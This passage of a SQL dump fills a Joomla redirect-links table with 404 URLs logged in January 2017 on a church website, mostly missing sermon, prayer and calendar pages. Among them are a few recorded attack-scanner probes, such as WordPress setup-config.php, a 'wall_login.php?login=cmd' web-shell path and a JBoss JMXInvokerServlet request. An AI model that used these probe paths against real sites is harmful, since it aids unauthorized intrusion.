(1706, 'http://www.lifeoasisinternationalchurch.org/wp/wp-admin/setup-config.php', NULL, '', '', 1, 0, '2017-01-13 08:13:42', '0000-00-00 00:00:00', 301),
(1707, 'http://www.lifeoasisinternationalchurch.org/wordpress/wp-admin/setup-config.php', NULL, '', '', 1, 0, '2017-01-13 08:13:43', '0000-00-00 00:00:00', 301),
(1708, 'http://www.lifeoasisinternationalchurch.org/resources/stream/18-loic/50-young-achievers', NULL, '', '', 5, 0, '2017-01-13 09:08:38', '0000-00-00 00:00:00', 301),
(1709, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/6', NULL, '', '', 3, 0, '2017-01-13 09:13:21', '0000-00-00 00:00:00', 301),
(1710, 'http://www.lifeoasisinternationalchurch.org/index.php/11-demo-articles/20-welcome', NULL, '', '', 3, 0, '2017-01-13 10:31:33', '0000-00-00 00:00:00', 301),
(1711, 'http://lifeoasisinternationalchurch.org/index.php/partnership/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-01-13 10:50:28', '0000-00-00 00:00:00', 301),
(1712, 'http://lifeoasisinternationalchurch.org/index.php/component/jcomments/feed/com_sermonspeaker/6', NULL, '', '', 1, 0, '2017-01-13 11:06:21', '0000-00-00 00:00:00', 301),
(1713, 'http://lifeoasisinternationalchurch.org/webalizer/', NULL, 'http://lifeoasisinternationalchurch.org/webalizer/', '', 1, 0, '2017-01-13 11:24:05', '0000-00-00 00:00:00', 301),
(1714, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1894/6/-', NULL, '', '', 1, 0, '2017-01-13 11:47:45', '0000-00-00 00:00:00', 301),
(1715, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/6/22/-', NULL, '', '', 1, 0, '2017-01-13 11:52:12', '0000-00-00 00:00:00', 301),
(1716, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/category-notes', NULL, '', '', 1, 0, '2017-01-13 12:15:16', '0000-00-00 00:00:00', 301),
(1717, 'http://www.lifeoasisinternationalchurch.org/index.php/live-services', NULL, '', '', 1, 0, '2017-01-13 13:22:23', '0000-00-00 00:00:00', 301),
(1718, 'http://www.lifeoasisinternationalchurch.org/template-info/11-demo-articles/6-integrated-extensions', NULL, '', '', 1, 0, '2017-01-13 13:35:45', '0000-00-00 00:00:00', 301),
(1719, 'http://www.lifeoasisinternationalchurch.org/template-info/16-fp-tabs', NULL, '', '', 1, 0, '2017-01-13 13:41:50', '0000-00-00 00:00:00', 301),
(1720, 'http://www.lifeoasisinternationalchurch.org/12-sample-content/18-sample-content-7', NULL, '', '', 6, 0, '2017-01-13 13:46:23', '0000-00-00 00:00:00', 301),
(1721, 'http://www.lifeoasisinternationalchurch.org/template-info/index.php?option=com_content&view=article&id=49:mimmp&catid=18:loic&Itemid=238', NULL, 'https://www.google.se/', '', 3, 0, '2017-01-13 15:20:37', '0000-00-00 00:00:00', 301),
(1722, 'http://lifeoasisinternationalchurch.org/component/content/category/18-loic', NULL, '', '', 5, 0, '2017-01-13 15:29:33', '0000-00-00 00:00:00', 301),
(1723, 'http://www.lifeoasisinternationalchurch.org/index.php/component/content/category/18-loic', NULL, '', '', 1, 0, '2017-01-13 15:33:50', '0000-00-00 00:00:00', 301),
(1724, 'http://www.lifeoasisinternationalchurch.org/about-us/', NULL, '', '', 3, 0, '2017-01-13 15:40:46', '0000-00-00 00:00:00', 301),
(1725, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/29', NULL, '', '', 4, 0, '2017-01-13 16:35:26', '0000-00-00 00:00:00', 301),
(1726, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2028/7/1/-', NULL, '', '', 1, 0, '2017-01-13 17:40:17', '0000-00-00 00:00:00', 301),
(1727, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/9/12/-', NULL, '', '', 1, 0, '2017-01-13 17:40:19', '0000-00-00 00:00:00', 301),
(1728, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1900/8/-', NULL, '', '', 1, 0, '2017-01-13 17:40:22', '0000-00-00 00:00:00', 301),
(1729, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/1/3/-', NULL, '', '', 1, 0, '2017-01-13 17:40:26', '0000-00-00 00:00:00', 301),
(1730, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1893/5/-', NULL, '', '', 1, 0, '2017-01-13 17:40:30', '0000-00-00 00:00:00', 301),
(1731, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1892/9/-', NULL, '', '', 1, 0, '2017-01-13 17:40:34', '0000-00-00 00:00:00', 301),
(1732, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1899/7/-', NULL, '', '', 1, 0, '2017-01-13 17:40:42', '0000-00-00 00:00:00', 301),
(1733, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/7/6/-', NULL, '', '', 1, 0, '2017-01-13 17:40:51', '0000-00-00 00:00:00', 301),
(1734, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/10/6/-', NULL, '', '', 1, 0, '2017-01-13 17:40:59', '0000-00-00 00:00:00', 301),
(1735, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/6/17/-', NULL, '', '', 1, 0, '2017-01-13 17:41:07', '0000-00-00 00:00:00', 301),
(1736, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1898/6/-', NULL, '', '', 1, 0, '2017-01-13 17:41:16', '0000-00-00 00:00:00', 301),
(1737, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/11/17/-', NULL, '', '', 1, 0, '2017-01-13 17:41:24', '0000-00-00 00:00:00', 301),
(1738, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/8/15/-', NULL, '', '', 1, 0, '2017-01-13 17:41:33', '0000-00-00 00:00:00', 301),
(1739, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1892/5/-', NULL, '', '', 1, 0, '2017-01-13 17:41:41', '0000-00-00 00:00:00', 301),
(1740, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/9/7/-', NULL, '', '', 1, 0, '2017-01-13 17:41:49', '0000-00-00 00:00:00', 301),
(1741, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/8/31/-', NULL, '', '', 1, 0, '2017-01-13 17:41:58', '0000-00-00 00:00:00', 301),
(1742, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/4/13/-', NULL, '', '', 1, 0, '2017-01-13 17:42:06', '0000-00-00 00:00:00', 301),
(1743, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1890/10/-', NULL, '', '', 1, 0, '2017-01-13 17:42:15', '0000-00-00 00:00:00', 301),
(1744, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1890/9/-', NULL, '', '', 1, 0, '2017-01-13 17:42:23', '0000-00-00 00:00:00', 301),
(1745, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1893/7/-', NULL, '', '', 1, 0, '2017-01-13 17:42:32', '0000-00-00 00:00:00', 301),
(1746, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1891/5/-', NULL, '', '', 1, 0, '2017-01-13 17:42:41', '0000-00-00 00:00:00', 301),
(1747, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1890/8/-', NULL, '', '', 1, 0, '2017-01-13 17:42:51', '0000-00-00 00:00:00', 301),
(1748, 'http://lifeoasisinternationalchurch.org/testimonies/month.calendar/2012/10/17/-', NULL, '', '', 1, 0, '2017-01-13 18:02:31', '0000-00-00 00:00:00', 301),
(1749, 'http://www.lifeoasisinternationalchurch.org/component/content/article/17-fp-headlines-lists/55-kb-zp', NULL, '', '', 3, 0, '2017-01-13 18:29:38', '0000-00-00 00:00:00', 301),
(1750, 'http://lifeoasisinternationalchurch.org/ev', NULL, '', '', 1, 0, '2017-01-13 19:39:43', '0000-00-00 00:00:00', 301),
(1751, 'http://www.lifeoasisinternationalchurch.org/template-info/12-sample-content/18-sample-content-7', NULL, '', '', 1, 0, '2017-01-13 20:01:05', '0000-00-00 00:00:00', 301),
(1752, 'http://www.lifeoasisinternationalchurch.org/index.php/component/jcomments/feed/com_sermonspeaker/21', NULL, '', '', 3, 0, '2017-01-13 20:25:29', '0000-00-00 00:00:00', 301),
(1753, 'http://lifeoasisinternationalchurch.org/template-info/media-outreach', NULL, '', '', 28, 0, '2017-01-13 20:52:24', '0000-00-00 00:00:00', 301),
(1754, 'http://www.lifeoasisinternationalchurch.org/programmes', NULL, '', '', 1, 0, '2017-01-13 20:52:55', '0000-00-00 00:00:00', 301),
(1755, 'http://www.lifeoasisinternationalchurch.org//wall_login.php?login=cmd', NULL, '', '', 1, 0, '2017-01-13 22:32:39', '0000-00-00 00:00:00', 301),
(1756, 'http://www.lifeoasisinternationalchurch.org/component/content/article/7-kindom-builder/12-prayer-a-fasting-day-3', NULL, '', '', 2, 0, '2017-01-14 00:13:00', '0000-00-00 00:00:00', 301),
(1757, 'http://lifeoasisinternationalchurch.org/mp3-messages/sermon/21-dealing-with-buts-in-your-life', NULL, '', '', 11, 0, '2017-01-14 01:46:42', '0000-00-00 00:00:00', 301),
(1758, 'http://lifeoasisinternationalchurch.org/media/com_sermonspeaker/css/css-4d49fbf156a573f3f03da4ac5e633a18.php', NULL, 'https://lifeoasisinternationalchurch.org/mp3-messages/sermon/21-dealing-with-buts-in-your-life', '', 3, 0, '2017-01-14 01:53:10', '0000-00-00 00:00:00', 301),
(1759, 'http://lifeoasisinternationalchurch.org/mp3-messages/sermon/17-entering-into-winning-position-5', NULL, '', '', 15, 0, '2017-01-14 04:29:12', '0000-00-00 00:00:00', 301),
(1760, 'http://lifeoasisinternationalchurch.org/mp3-messages/speaker/3-rev-mrs-oyenike-areogun/popup?tmpl=component', NULL, '', '', 8, 0, '2017-01-14 04:48:46', '0000-00-00 00:00:00', 301),
(1761, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1890/5/-', NULL, '', '', 1, 0, '2017-01-14 04:52:57', '0000-00-00 00:00:00', 301),
(1762, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1888/9/-', NULL, '', '', 1, 0, '2017-01-14 04:53:03', '0000-00-00 00:00:00', 301),
(1763, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/8/21/-', NULL, '', '', 1, 0, '2017-01-14 04:53:20', '0000-00-00 00:00:00', 301),
(1764, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/7/1/-', NULL, '', '', 1, 0, '2017-01-14 04:53:29', '0000-00-00 00:00:00', 301),
(1765, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/10/14/-', NULL, '', '', 1, 0, '2017-01-14 04:53:37', '0000-00-00 00:00:00', 301),
(1766, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1891/7/-', NULL, '', '', 1, 0, '2017-01-14 04:53:46', '0000-00-00 00:00:00', 301),
(1767, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1888/8/-', NULL, '', '', 1, 0, '2017-01-14 04:53:55', '0000-00-00 00:00:00', 301),
(1768, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1890/7/-', NULL, '', '', 1, 0, '2017-01-14 04:54:04', '0000-00-00 00:00:00', 301),
(1769, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1886/4/-', NULL, '', '', 1, 0, '2017-01-14 04:54:12', '0000-00-00 00:00:00', 301),
(1770, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1888/6/-', NULL, '', '', 1, 0, '2017-01-14 04:54:21', '0000-00-00 00:00:00', 301),
(1771, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1886/2/-', NULL, '', '', 1, 0, '2017-01-14 04:54:30', '0000-00-00 00:00:00', 301),
(1772, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1885/3/-', NULL, '', '', 1, 0, '2017-01-14 04:54:38', '0000-00-00 00:00:00', 301),
(1773, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1887/1/-', NULL, '', '', 1, 0, '2017-01-14 04:54:47', '0000-00-00 00:00:00', 301),
(1774, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/7/27/-', NULL, '', '', 1, 0, '2017-01-14 04:54:56', '0000-00-00 00:00:00', 301),
(1775, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1887/5/-', NULL, '', '', 1, 0, '2017-01-14 04:55:04', '0000-00-00 00:00:00', 301),
(1776, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1888/11/-', NULL, '', '', 1, 0, '2017-01-14 04:55:13', '0000-00-00 00:00:00', 301),
(1777, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/1/2/-', NULL, '', '', 1, 0, '2017-01-14 04:55:22', '0000-00-00 00:00:00', 301),
(1778, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1887/12/-', NULL, '', '', 1, 0, '2017-01-14 04:55:30', '0000-00-00 00:00:00', 301),
(1779, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1887/6/-', NULL, '', '', 1, 0, '2017-01-14 04:55:39', '0000-00-00 00:00:00', 301),
(1780, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1889/7/-', NULL, '', '', 1, 0, '2017-01-14 04:55:48', '0000-00-00 00:00:00', 301),
(1781, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1886/6/-', NULL, '', '', 1, 0, '2017-01-14 04:55:57', '0000-00-00 00:00:00', 301),
(1782, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1884/2/-', NULL, '', '', 1, 0, '2017-01-14 04:56:05', '0000-00-00 00:00:00', 301),
(1783, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/11/19/-', NULL, '', '', 1, 0, '2017-01-14 04:56:14', '0000-00-00 00:00:00', 301),
(1784, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/7/15/-', NULL, '', '', 1, 0, '2017-01-14 04:56:23', '0000-00-00 00:00:00', 301),
(1785, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/4/6/-', NULL, '', '', 1, 0, '2017-01-14 04:56:31', '0000-00-00 00:00:00', 301),
(1786, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/9/30/-', NULL, '', '', 1, 0, '2017-01-14 04:56:40', '0000-00-00 00:00:00', 301),
(1787, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/12/10/-', NULL, '', '', 1, 0, '2017-01-14 04:56:49', '0000-00-00 00:00:00', 301),
(1788, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/11/27/-', NULL, '', '', 1, 0, '2017-01-14 04:56:58', '0000-00-00 00:00:00', 301),
(1789, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/9/1/-', NULL, '', '', 1, 0, '2017-01-14 04:57:06', '0000-00-00 00:00:00', 301),
(1790, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/9/16/-', NULL, '', '', 1, 0, '2017-01-14 04:57:15', '0000-00-00 00:00:00', 301),
(1791, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/10/5/-', NULL, '', '', 1, 0, '2017-01-14 04:57:24', '0000-00-00 00:00:00', 301),
(1792, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/6/28/-', NULL, '', '', 1, 0, '2017-01-14 04:57:33', '0000-00-00 00:00:00', 301),
(1793, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/8/19/-', NULL, '', '', 1, 0, '2017-01-14 04:57:42', '0000-00-00 00:00:00', 301),
(1794, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/9/19/-', NULL, '', '', 1, 0, '2017-01-14 04:57:53', '0000-00-00 00:00:00', 301),
(1795, 'http://www.lifeoasisinternationalchurch.org/index.php/218-2016-day-1', NULL, '', '', 9, 0, '2017-01-14 07:16:05', '0000-00-00 00:00:00', 301),
(1796, 'http://lifeoasisinternationalchurch.org/mp3-messages/sermon/12-manifesting-spiritual-gifts', NULL, '', '', 11, 0, '2017-01-14 08:20:28', '0000-00-00 00:00:00', 301),
(1797, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/itemlist/tag/HTML5', NULL, '', '', 1, 0, '2017-01-14 09:31:33', '0000-00-00 00:00:00', 301),
(1798, 'http://lifeoasisinternationalchurch.org/videos', NULL, '', '', 25, 0, '2017-01-14 11:04:36', '0000-00-00 00:00:00', 301),
(1799, 'http://www.lifeoasisinternationalchurch.org/18-loic/35-trm', NULL, '', '', 5, 0, '2017-01-14 12:29:07', '0000-00-00 00:00:00', 301),
(1800, 'http://lifeoasisinternationalchurch.org/blog/wp-admin/setup-config.php', NULL, '', '', 2, 0, '2017-01-14 14:24:03', '0000-00-00 00:00:00', 301),
(1801, 'http://lifeoasisinternationalchurch.org/wp/wp-admin/setup-config.php', NULL, '', '', 2, 0, '2017-01-14 14:24:03', '0000-00-00 00:00:00', 301),
(1802, 'http://lifeoasisinternationalchurch.org/wordpress/wp-admin/setup-config.php', NULL, '', '', 2, 0, '2017-01-14 14:24:03', '0000-00-00 00:00:00', 301),
(1803, 'http://www.lifeoasisinternationalchurch.org/index.php/component/jcomments/feed/com_sermonspeaker/27', NULL, '', '', 3, 0, '2017-01-14 16:08:02', '0000-00-00 00:00:00', 301),
(1804, 'http://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/6', NULL, '', '', 2, 0, '2017-01-14 16:11:53', '0000-00-00 00:00:00', 301),
(1805, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/category-joomla/itemlist/tag/church', NULL, '', '', 1, 0, '2017-01-14 16:13:23', '0000-00-00 00:00:00', 301),
(1806, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/speaker/3-rev-mrs-oyenike-areogun/popup?tmpl=component', NULL, '', '', 2, 0, '2017-01-14 16:34:43', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(1807, 'http://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/47-prayer-a-fasting-day-36', NULL, '', '', 3, 0, '2017-01-14 17:14:21', '0000-00-00 00:00:00', 301),
(1808, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&id=33&Itemid=200', NULL, '', '', 2, 0, '2017-01-14 17:59:45', '0000-00-00 00:00:00', 301),
(1809, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/90572', NULL, '', '', 2, 0, '2017-01-14 18:13:42', '0000-00-00 00:00:00', 301),
(1810, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1885/1/-', NULL, '', '', 1, 0, '2017-01-14 19:34:54', '0000-00-00 00:00:00', 301),
(1811, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1885/12/-', NULL, '', '', 1, 0, '2017-01-14 19:36:28', '0000-00-00 00:00:00', 301),
(1812, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/10/29/-', NULL, '', '', 1, 0, '2017-01-14 19:37:01', '0000-00-00 00:00:00', 301),
(1813, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/9/15/-', NULL, '', '', 1, 0, '2017-01-14 19:37:38', '0000-00-00 00:00:00', 301),
(1814, 'http://lifeoasisinternationalchurch.org/index.php/component/content/article/18-wifi-zion/34-wife-of-ministers-of-the-gospel-outline', NULL, '', '', 4, 0, '2017-01-14 19:40:56', '0000-00-00 00:00:00', 301),
(1815, 'http://ljmti.lifeoasisinternationalchurch.org/resources/blog/item/', NULL, '', '', 1, 0, '2017-01-14 20:33:38', '0000-00-00 00:00:00', 301),
(1816, 'http://www.lifeoasisinternationalchurch.org/component/content/article/18-loic/34-music', NULL, '', '', 6, 0, '2017-01-14 20:51:31', '0000-00-00 00:00:00', 301),
(1817, 'http://www.lifeoasisinternationalchurch.org/7-kindom-builder/34-prayer-a-fasting-day-25', NULL, '', '', 6, 0, '2017-01-14 21:48:56', '0000-00-00 00:00:00', 301),
(1818, 'http://lifeoasisinternationalchurch.org/invoker/JMXInvokerServlet', NULL, '', '', 3, 0, '2017-01-14 21:49:48', '0000-00-00 00:00:00', 301),
(1819, 'http://lifeoasisinternationalchurch.org/prayer/component/content/article/7-kindom-builder/34-prayer-a-fasting-day-25', NULL, '', '', 1, 0, '2017-01-14 23:12:03', '0000-00-00 00:00:00', 301),
(1820, 'http://www.lifeoasisinternationalchurch.org/component/content/article/7-kindom-builder/33-prayer-a-fasting-day-24', NULL, '', '', 18, 0, '2017-01-14 23:40:12', '0000-00-00 00:00:00', 301),
(1821, 'http://www.lifeoasisinternationalchurch.org/prayer/component/content/article/7-kindom-builder/34-prayer-a-fasting-day-25', NULL, '', '', 4, 0, '2017-01-14 23:42:14', '0000-00-00 00:00:00', 301),
(1822, 'http://www.lifeoasisinternationalchurch.org/templates/rt_ionosphere/css/css-f6163819fe143f8e41e43a2c4c098601.php', NULL, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/12-manifesting-spiritual-gifts?layout=popup&tmpl=component', '', 25, 0, '2017-01-15 02:22:26', '0000-00-00 00:00:00', 301),
(1823, 'http://lifeoasisinternationalchurch.org/component/jcomments/captcha/97284', NULL, '', '', 1, 0, '2017-01-15 02:30:55', '0000-00-00 00:00:00', 301),
(1824, 'http://www.lifeoasisinternationalchurch.org/index.php/274-day-14-of-21-days-fasting-and-prayer-november', NULL, '', '', 10, 0, '2017-01-15 04:42:57', '0000-00-00 00:00:00', 301),
(1825, 'http://www.lifeoasisinternationalchurch.org/index.php/225-2016-day-8', NULL, '', '', 8, 0, '2017-01-15 04:44:54', '0000-00-00 00:00:00', 301),
(1826, 'http://www.lifeoasisinternationalchurch.org/resources/father-s-heart/18-loic/50-young-achievers', NULL, '', '', 13, 0, '2017-01-15 04:58:51', '0000-00-00 00:00:00', 301),
(1827, 'http://www.lifeoasisinternationalchurch.org/asom2016', NULL, '', '', 7, 0, '2017-01-15 05:01:55', '0000-00-00 00:00:00', 301),
(1828, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1887/10/-', NULL, '', '', 1, 0, '2017-01-15 05:37:57', '0000-00-00 00:00:00', 301),
(1829, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1886/11/-', NULL, '', '', 1, 0, '2017-01-15 05:38:12', '0000-00-00 00:00:00', 301),
(1830, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/6/13/-', NULL, '', '', 1, 0, '2017-01-15 05:38:39', '0000-00-00 00:00:00', 301),
(1831, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/7/10/-', NULL, '', '', 1, 0, '2017-01-15 05:39:05', '0000-00-00 00:00:00', 301),
(1832, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1887/8/-', NULL, '', '', 1, 0, '2017-01-15 05:39:28', '0000-00-00 00:00:00', 301),
(1833, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1885/6/-', NULL, '', '', 1, 0, '2017-01-15 05:39:51', '0000-00-00 00:00:00', 301),
(1834, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/11/2/-', NULL, '', '', 1, 0, '2017-01-15 05:40:15', '0000-00-00 00:00:00', 301),
(1835, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1885/5/-', NULL, '', '', 1, 0, '2017-01-15 05:41:02', '0000-00-00 00:00:00', 301),
(1836, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1886/9/-', NULL, '', '', 1, 0, '2017-01-15 05:41:26', '0000-00-00 00:00:00', 301),
(1837, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/4/18/-', NULL, '', '', 1, 0, '2017-01-15 05:41:50', '0000-00-00 00:00:00', 301),
(1838, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1883/1/-', NULL, '', '', 1, 0, '2017-01-15 05:43:49', '0000-00-00 00:00:00', 301),
(1839, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/6/18/-', NULL, '', '', 1, 0, '2017-01-15 05:47:27', '0000-00-00 00:00:00', 301),
(1840, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/1/8/-', NULL, '', '', 1, 0, '2017-01-15 05:51:13', '0000-00-00 00:00:00', 301),
(1841, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/8/8/-', NULL, '', '', 1, 0, '2017-01-15 05:55:00', '0000-00-00 00:00:00', 301),
(1842, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/7/13/-', NULL, '', '', 1, 0, '2017-01-15 05:58:47', '0000-00-00 00:00:00', 301),
(1843, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1886/8/-', NULL, '', '', 1, 0, '2017-01-15 06:02:35', '0000-00-00 00:00:00', 301),
(1844, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/category-joomla/itemlist/tag/Joomla', NULL, '', '', 2, 0, '2017-01-15 07:04:16', '0000-00-00 00:00:00', 301),
(1845, 'http://lifeoasisinternationalchurch.org/blog/item/15-rapture', NULL, 'http://lifeoasisinternationalchurch.org/', '', 1, 0, '2017-01-15 07:07:00', '0000-00-00 00:00:00', 301),
(1846, 'http://lifeoasisinternationalchurch.org/index.php/139-day-13', NULL, '', '', 1, 0, '2017-01-15 09:15:45', '0000-00-00 00:00:00', 301),
(1847, 'http://lifeoasisinternationalchurch.org//wall_login.php?login=cmd', NULL, '', '', 1, 0, '2017-01-15 12:09:51', '0000-00-00 00:00:00', 301),
(1848, 'http://ljmti.lifeoasisinternationalchurch.org/favicon.png', NULL, '', '', 2, 0, '2017-01-15 12:16:39', '0000-00-00 00:00:00', 301),
(1849, 'http://lifeoasisinternationalchurch.org/prayer/128-prayer-focus-for-day-39', NULL, '', '', 1, 0, '2017-01-15 12:41:26', '0000-00-00 00:00:00', 301),
(1850, 'http://lifeoasisinternationalchurch.org/2012-11-09-09-57-10/father-s-heart', NULL, '', '', 6, 0, '2017-01-15 13:20:19', '0000-00-00 00:00:00', 301),
(1851, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/speaker/2-rev-olusola-ayodele-areogun/popup', NULL, '', '', 8, 0, '2017-01-15 13:52:49', '0000-00-00 00:00:00', 301),
(1852, 'http://www.lifeoasisinternationalchurch.org/7-kindom-builder/33-prayer-a-fasting-day-24', NULL, '', '', 5, 0, '2017-01-15 14:13:12', '0000-00-00 00:00:00', 301),
(1853, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_extrawatch&origin=frontend&ewToken=f06070caa9f2e2a76477621576860e3a251b306d&task=ajax&action=unloaded', NULL, 'http://www.lifeoasisinternationalchurch.org/streaming', '', 1, 0, '2017-01-15 14:34:36', '0000-00-00 00:00:00', 301),
(1854, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1884/11/-', NULL, '', '', 1, 0, '2017-01-15 15:08:01', '0000-00-00 00:00:00', 301),
(1855, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1883/12/-', NULL, '', '', 1, 0, '2017-01-15 15:08:08', '0000-00-00 00:00:00', 301),
(1856, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1885/10/-', NULL, '', '', 1, 0, '2017-01-15 15:08:50', '0000-00-00 00:00:00', 301),
(1857, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/8/25/-', NULL, '', '', 1, 0, '2017-01-15 15:09:04', '0000-00-00 00:00:00', 301),
(1858, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/10/8/-', NULL, '', '', 1, 0, '2017-01-15 15:09:18', '0000-00-00 00:00:00', 301),
(1859, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/12/16/-', NULL, '', '', 1, 0, '2017-01-15 15:09:32', '0000-00-00 00:00:00', 301),
(1860, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/11/10/-', NULL, '', '', 1, 0, '2017-01-15 15:09:46', '0000-00-00 00:00:00', 301),
(1861, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/6/25/-', NULL, '', '', 1, 0, '2017-01-15 15:10:00', '0000-00-00 00:00:00', 301),
(1862, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/1/30/-', NULL, '', '', 1, 0, '2017-01-15 15:10:13', '0000-00-00 00:00:00', 301),
